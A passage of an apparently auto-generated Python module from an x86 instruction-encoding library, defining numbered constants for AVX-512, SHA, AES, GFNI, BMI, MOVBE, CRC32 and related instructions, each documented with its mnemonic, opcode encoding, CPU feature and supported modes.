EVEX_VFNMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3584
"""
``VFNMSUB231PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 BE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3585
"""
``VFNMSUB231PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 BE /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB231SS_XMM_XMM_XMMM32: int = 3586
"""
``VFNMSUB231SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 BF /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB231SD_XMM_XMM_XMMM64: int = 3587
"""
``VFNMSUB231SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 BF /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3588
"""
``VFNMSUB231SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 BF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3589
"""
``VFNMSUB231SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 BF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_XMM_K1Z_XMMM128B32: int = 3590
"""
``VPCONFLICTD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_YMM_K1Z_YMMM256B32: int = 3591
"""
``VPCONFLICTD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTD_ZMM_K1Z_ZMMM512B32: int = 3592
"""
``VPCONFLICTD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 C4 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_XMM_K1Z_XMMM128B64: int = 3593
"""
``VPCONFLICTQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_YMM_K1Z_YMMM256B64: int = 3594
"""
``VPCONFLICTQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 C4 /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPCONFLICTQ_ZMM_K1Z_ZMMM512B64: int = 3595
"""
``VPCONFLICTQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 C4 /r``
``AVX512CD``
``16/32/64-bit``
"""
EVEX_VGATHERPF0DPS_VM32Z_K1: int = 3596
"""
``VGATHERPF0DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0DPD_VM32Y_K1: int = 3597
"""
``VGATHERPF0DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1DPS_VM32Z_K1: int = 3598
"""
``VGATHERPF1DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1DPD_VM32Y_K1: int = 3599
"""
``VGATHERPF1DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0DPS_VM32Z_K1: int = 3600
"""
``VSCATTERPF0DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0DPD_VM32Y_K1: int = 3601
"""
``VSCATTERPF0DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1DPS_VM32Z_K1: int = 3602
"""
``VSCATTERPF1DPS vm32z {k1}``
``EVEX.512.66.0F38.W0 C6 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1DPD_VM32Y_K1: int = 3603
"""
``VSCATTERPF1DPD vm32y {k1}``
``EVEX.512.66.0F38.W1 C6 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0QPS_VM64Z_K1: int = 3604
"""
``VGATHERPF0QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF0QPD_VM64Z_K1: int = 3605
"""
``VGATHERPF0QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /1 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1QPS_VM64Z_K1: int = 3606
"""
``VGATHERPF1QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VGATHERPF1QPD_VM64Z_K1: int = 3607
"""
``VGATHERPF1QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /2 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0QPS_VM64Z_K1: int = 3608
"""
``VSCATTERPF0QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF0QPD_VM64Z_K1: int = 3609
"""
``VSCATTERPF0QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /5 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1QPS_VM64Z_K1: int = 3610
"""
``VSCATTERPF1QPS vm64z {k1}``
``EVEX.512.66.0F38.W0 C7 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
EVEX_VSCATTERPF1QPD_VM64Z_K1: int = 3611
"""
``VSCATTERPF1QPD vm64z {k1}``
``EVEX.512.66.0F38.W1 C7 /6 /vsib``
``AVX512PF``
``16/32/64-bit``
"""
SHA1NEXTE_XMM_XMMM128: int = 3612
"""
``SHA1NEXTE xmm1, xmm2/m128``
``NP 0F 38 C8 /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VEXP2PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3613
"""
``VEXP2PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 C8 /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VEXP2PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3614
"""
``VEXP2PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 C8 /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA1MSG1_XMM_XMMM128: int = 3615
"""
``SHA1MSG1 xmm1, xmm2/m128``
``NP 0F 38 C9 /r``
``SHA``
``16/32/64-bit``
"""
SHA1MSG2_XMM_XMMM128: int = 3616
"""
``SHA1MSG2 xmm1, xmm2/m128``
``NP 0F 38 CA /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRCP28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3617
"""
``VRCP28PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 CA /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRCP28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3618
"""
``VRCP28PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 CA /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256RNDS2_XMM_XMMM128: int = 3619
"""
``SHA256RNDS2 xmm1, xmm2/m128, <XMM0>``
``NP 0F 38 CB /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRCP28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3620
"""
``VRCP28SS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 CB /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRCP28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3621
"""
``VRCP28SD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 CB /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256MSG1_XMM_XMMM128: int = 3622
"""
``SHA256MSG1 xmm1, xmm2/m128``
``NP 0F 38 CC /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRSQRT28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3623
"""
``VRSQRT28PS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}``
``EVEX.512.66.0F38.W0 CC /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRSQRT28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3624
"""
``VRSQRT28PD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}``
``EVEX.512.66.0F38.W1 CC /r``
``AVX512ER``
``16/32/64-bit``
"""
SHA256MSG2_XMM_XMMM128: int = 3625
"""
``SHA256MSG2 xmm1, xmm2/m128``
``NP 0F 38 CD /r``
``SHA``
``16/32/64-bit``
"""
EVEX_VRSQRT28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3626
"""
``VRSQRT28SS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.66.0F38.W0 CD /r``
``AVX512ER``
``16/32/64-bit``
"""
EVEX_VRSQRT28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3627
"""
``VRSQRT28SD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.66.0F38.W1 CD /r``
``AVX512ER``
``16/32/64-bit``
"""
GF2P8MULB_XMM_XMMM128: int = 3628
"""
``GF2P8MULB xmm1, xmm2/m128``
``66 0F 38 CF /r``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8MULB_XMM_XMM_XMMM128: int = 3629
"""
``VGF2P8MULB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 CF /r``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8MULB_YMM_YMM_YMMM256: int = 3630
"""
``VGF2P8MULB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 CF /r``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_XMM_K1Z_XMM_XMMM128: int = 3631
"""
``VGF2P8MULB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 CF /r``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_YMM_K1Z_YMM_YMMM256: int = 3632
"""
``VGF2P8MULB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 CF /r``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8MULB_ZMM_K1Z_ZMM_ZMMM512: int = 3633
"""
``VGF2P8MULB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 CF /r``
``AVX512F and GFNI``
``16/32/64-bit``
"""
AESIMC_XMM_XMMM128: int = 3634
"""
``AESIMC xmm1, xmm2/m128``
``66 0F 38 DB /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESIMC_XMM_XMMM128: int = 3635
"""
``VAESIMC xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG DB /r``
``AES and AVX``
``16/32/64-bit``
"""
AESENC_XMM_XMMM128: int = 3636
"""
``AESENC xmm1, xmm2/m128``
``66 0F 38 DC /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESENC_XMM_XMM_XMMM128: int = 3637
"""
``VAESENC xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DC /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESENC_YMM_YMM_YMMM256: int = 3638
"""
``VAESENC ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DC /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_XMM_XMM_XMMM128: int = 3639
"""
``VAESENC xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DC /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_YMM_YMM_YMMM256: int = 3640
"""
``VAESENC ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DC /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENC_ZMM_ZMM_ZMMM512: int = 3641
"""
``VAESENC zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DC /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESENCLAST_XMM_XMMM128: int = 3642
"""
``AESENCLAST xmm1, xmm2/m128``
``66 0F 38 DD /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3643
"""
``VAESENCLAST xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DD /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3644
"""
``VAESENCLAST ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DD /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3645
"""
``VAESENCLAST xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DD /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3646
"""
``VAESENCLAST ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DD /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512: int = 3647
"""
``VAESENCLAST zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DD /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESDEC_XMM_XMMM128: int = 3648
"""
``AESDEC xmm1, xmm2/m128``
``66 0F 38 DE /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESDEC_XMM_XMM_XMMM128: int = 3649
"""
``VAESDEC xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DE /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESDEC_YMM_YMM_YMMM256: int = 3650
"""
``VAESDEC ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DE /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_XMM_XMM_XMMM128: int = 3651
"""
``VAESDEC xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DE /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_YMM_YMM_YMMM256: int = 3652
"""
``VAESDEC ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DE /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDEC_ZMM_ZMM_ZMMM512: int = 3653
"""
``VAESDEC zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DE /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
AESDECLAST_XMM_XMMM128: int = 3654
"""
``AESDECLAST xmm1, xmm2/m128``
``66 0F 38 DF /r``
``AES``
``16/32/64-bit``
"""
VEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3655
"""
``VAESDECLAST xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG DF /r``
``AES and AVX``
``16/32/64-bit``
"""
VEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3656
"""
``VAESDECLAST ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG DF /r``
``VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3657
"""
``VAESDECLAST xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG DF /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3658
"""
``VAESDECLAST ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG DF /r``
``AVX512VL and VAES``
``16/32/64-bit``
"""
EVEX_VAESDECLAST_ZMM_ZMM_ZMMM512: int = 3659
"""
``VAESDECLAST zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG DF /r``
``AVX512F and VAES``
``16/32/64-bit``
"""
MOVBE_R16_M16: int = 3660
"""
``MOVBE r16, m16``
``o16 0F 38 F0 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_R32_M32: int = 3661
"""
``MOVBE r32, m32``
``o32 0F 38 F0 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_R64_M64: int = 3662
"""
``MOVBE r64, m64``
``o64 0F 38 F0 /r``
``MOVBE``
``64-bit``
"""
CRC32_R32_RM8: int = 3663
"""
``CRC32 r32, r/m8``
``F2 0F 38 F0 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R64_RM8: int = 3664
"""
``CRC32 r64, r/m8``
``F2 o64 0F 38 F0 /r``
``SSE4.2``
``64-bit``
"""
MOVBE_M16_R16: int = 3665
"""
``MOVBE m16, r16``
``o16 0F 38 F1 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_M32_R32: int = 3666
"""
``MOVBE m32, r32``
``o32 0F 38 F1 /r``
``MOVBE``
``16/32/64-bit``
"""
MOVBE_M64_R64: int = 3667
"""
``MOVBE m64, r64``
``o64 0F 38 F1 /r``
``MOVBE``
``64-bit``
"""
CRC32_R32_RM16: int = 3668
"""
``CRC32 r32, r/m16``
``o16 F2 0F 38 F1 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R32_RM32: int = 3669
"""
``CRC32 r32, r/m32``
``o32 F2 0F 38 F1 /r``
``SSE4.2``
``16/32/64-bit``
"""
CRC32_R64_RM64: int = 3670
"""
``CRC32 r64, r/m64``
``F2 o64 0F 38 F1 /r``
``SSE4.2``
``64-bit``
"""
VEX_ANDN_R32_R32_RM32: int = 3671
"""
``ANDN r32a, r32b, r/m32``
``VEX.LZ.0F38.W0 F2 /r``
``BMI1``
``16/32/64-bit``
"""
VEX_ANDN_R64_R64_RM64: int = 3672
"""
``ANDN r64a, r64b, r/m64``
``VEX.LZ.0F38.W1 F2 /r``
``BMI1``
``64-bit``
"""
VEX_BLSR_R32_RM32: int = 3673
"""
``BLSR r32, r/m32``
``VEX.LZ.0F38.W0 F3 /1``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSR_R64_RM64: int = 3674
"""
``BLSR r64, r/m64``
``VEX.LZ.0F38.W1 F3 /1``
``BMI1``
``64-bit``
"""
VEX_BLSMSK_R32_RM32: int = 3675
"""
``BLSMSK r32, r/m32``
``VEX.LZ.0F38.W0 F3 /2``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSMSK_R64_RM64: int = 3676
"""
``BLSMSK r64, r/m64``
``VEX.LZ.0F38.W1 F3 /2``
``BMI1``
``64-bit``
"""
VEX_BLSI_R32_RM32: int = 3677
"""
``BLSI r32, r/m32``
``VEX.LZ.0F38.W0 F3 /3``
``BMI1``
``16/32/64-bit``
"""
VEX_BLSI_R64_RM64: int = 3678
"""
``BLSI r64, r/m64``
``VEX.LZ.0F38.W1 F3 /3``
``BMI1``
``64-bit``
"""
VEX_BZHI_R32_RM32_R32: int = 3679
"""
``BZHI r32a, r/m32, r32b``
``VEX.LZ.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_BZHI_R64_RM64_R64: int = 3680
"""
``BZHI r64a, r/m64, r64b``
``VEX.LZ.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
WRUSSD_M32_R32: int = 3681
"""
``WRUSSD m32, r32``
``66 0F 38 F5 /r``
``CET_SS``
``16/32/64-bit``
"""
WRUSSQ_M64_R64: int = 3682
"""
``WRUSSQ m64, r64``
``66 o64 0F 38 F5 /r``
``CET_SS``
``64-bit``
"""
VEX_PEXT_R32_R32_RM32: int = 3683
"""
``PEXT r32a, r32b, r/m32``
``VEX.LZ.F3.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_PEXT_R64_R64_RM64: int = 3684
"""
``PEXT r64a, r64b, r/m64``
``VEX.LZ.F3.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
VEX_PDEP_R32_R32_RM32: int = 3685
"""
``PDEP r32a, r32b, r/m32``
``VEX.LZ.F2.0F38.W0 F5 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_PDEP_R64_R64_RM64: int = 3686
"""
``PDEP r64a, r64b, r/m64``
``VEX.LZ.F2.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
WRSSD_M32_R32: int = 3687
"""
``WRSSD m32, r32``
``NP 0F 38 F6 /r``
``CET_SS``
``16/32/64-bit``
"""
WRSSQ_M64_R64: int = 3688
"""
``WRSSQ m64, r64``
``NP o64 0F 38 F6 /r``
``CET_SS``
``64-bit``
"""
ADCX_R32_RM32: int = 3689
"""
``ADCX r32, r/m32``
``66 0F 38 F6 /r``
``ADX``
``16/32/64-bit``
"""
ADCX_R64_RM64: int = 3690
"""
``ADCX r64, r/m64``
``66 o64 0F 38 F6 /r``
``ADX``
``64-bit``
"""
ADOX_R32_RM32: int = 3691
"""
``ADOX r32, r/m32``
``F3 0F 38 F6 /r``
``ADX``
``16/32/64-bit``
"""
ADOX_R64_RM64: int = 3692
"""
``ADOX r64, r/m64``
``F3 o64 0F 38 F6 /r``
``ADX``
``64-bit``
"""
VEX_MULX_R32_R32_RM32: int = 3693
"""
``MULX r32a, r32b, r/m32``
``VEX.LZ.F2.0F38.W0 F6 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_MULX_R64_R64_RM64: int = 3694
"""
``MULX r64a, r64b, r/m64``
``VEX.LZ.F2.0F38.W1 F6 /r``
``BMI2``
``64-bit``
"""
VEX_BEXTR_R32_RM32_R32: int = 3695
"""
``BEXTR r32a, r/m32, r32b``
``VEX.LZ.0F38.W0 F7 /r``
``BMI1``
``16/32/64-bit``
"""
VEX_BEXTR_R64_RM64_R64: int = 3696
"""
``BEXTR r64a, r/m64, r64b``
``VEX.LZ.0F38.W1 F7 /r``
``BMI1``
``64-bit``
"""
VEX_SHLX_R32_RM32_R32: int = 3697
"""
``SHLX r32a, r/m32, r32b``
``VEX.LZ.66.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SHLX_R64_RM64_R64: int = 3698
"""
``SHLX r64a, r/m64, r64b``
``VEX.LZ.66.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
VEX_SARX_R32_RM32_R32: int = 3699
"""
``SARX r32a, r/m32, r32b``
``VEX.LZ.F3.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SARX_R64_RM64_R64: int = 3700
"""
``SARX r64a, r/m64, r64b``
``VEX.LZ.F3.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
VEX_SHRX_R32_RM32_R32: int = 3701
"""
``SHRX r32a, r/m32, r32b``
``VEX.LZ.F2.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SHRX_R64_RM64_R64: int = 3702
"""
``SHRX r64a, r/m64, r64b``
``VEX.LZ.F2.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
MOVDIR64B_R16_M512: int = 3703
"""
``MOVDIR64B r16, m512``
``a16 66 0F 38 F8 /r``
``MOVDIR64B``
``16/32-bit``
"""
MOVDIR64B_R32_M512: int = 3704
"""
``MOVDIR64B r32, m512``
``a32 66 0F 38 F8 /r``
``MOVDIR64B``
``16/32/64-bit``
"""
MOVDIR64B_R64_M512: int = 3705
"""
``MOVDIR64B r64, m512``
``a64 66 0F 38 F8 /r``
``MOVDIR64B``
``64-bit``
"""
ENQCMDS_R16_M512: int = 3706
"""
``ENQCMDS r16, m512``
``a16 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32-bit``
"""
ENQCMDS_R32_M512: int = 3707
"""
``ENQCMDS r32, m512``
``a32 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32/64-bit``
"""
ENQCMDS_R64_M512: int = 3708
"""
``ENQCMDS r64, m512``
``a64 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``64-bit``
"""
ENQCMD_R16_M512: int = 3709
"""
``ENQCMD r16, m512``
``a16 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32-bit``
"""
ENQCMD_R32_M512: int = 3710
"""
``ENQCMD r32, m512``
``a32 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32/64-bit``
"""
ENQCMD_R64_M512: int = 3711
"""
``ENQCMD r64, m512``
``a64 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``64-bit``
"""
MOVDIRI_M32_R32: int = 3712
"""
``MOVDIRI m32, r32``
``NP 0F 38 F9 /r``
``MOVDIRI``
``16/32/64-bit``
"""
MOVDIRI_M64_R64: int = 3713
"""
``MOVDIRI m64, r64``
``NP o64 0F 38 F9 /r``
``MOVDIRI``
``64-bit``
"""
VEX_VPERMQ_YMM_YMMM256_IMM8: int = 3714
"""
``VPERMQ ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W1 00 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMQ_YMM_K1Z_YMMM256B64_IMM8: int = 3715
"""
``VPERMQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 00 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 3716
"""
``VPERMQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 00 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMPD_YMM_YMMM256_IMM8: int = 3717
"""
``VPERMPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W1 01 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMPD_YMM_K1Z_YMMM256B64_IMM8: int = 3718
"""
``VPERMPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 01 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3719
"""
``VPERMPD zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 01 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBLENDD_XMM_XMM_XMMM128_IMM8: int = 3720
"""
``VPBLENDD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W0 02 /r ib``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBLENDD_YMM_YMM_YMMM256_IMM8: int = 3721
"""
``VPBLENDD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 02 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VALIGND_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3722
"""
``VALIGND xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGND_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3723
"""
``VALIGND ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGND_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3724
"""
``VALIGND zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 03 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3725
"""
``VALIGNQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3726
"""
``VALIGNQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3727
"""
``VALIGNQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 03 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPS_XMM_XMMM128_IMM8: int = 3728
"""
``VPERMILPS xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 04 /r ib``
``AVX``
``16/32/64-bit``
"""
